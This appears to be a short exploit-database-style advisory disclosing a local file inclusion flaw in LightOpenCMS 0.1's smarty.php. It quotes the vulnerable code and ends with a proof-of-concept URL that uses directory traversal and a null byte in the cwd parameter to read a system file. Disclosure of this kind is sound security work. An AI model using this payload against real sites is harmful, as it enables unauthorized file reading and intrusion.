LightOpenCMS version 0.1 suffers from a local file inclusion vulnerability in smarty.php.
2ea8825b67f4a536dfc0abc3cd7c159bb6a646e5c38a8cbc229a44ba6e4ce178
LightOpenCMS 0.1 (smarty.php cwd) Local File Inclusion Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/
- download: http://sourceforge.net/project/showfiles.php?group_id=251474
[smarty.php]
define("SMARTY_DIR", $cwd."/smarty/");
require_once(SMARTY_DIR."/Smarty.class.php");
PoC:
[php.ini] register_globals= On
http://localhost/locms/smarty.php?cwd=../../../../../../../../../../../../boot.ini%00
Greetz: YEnH4ckEr, str0ke and spanish hackers!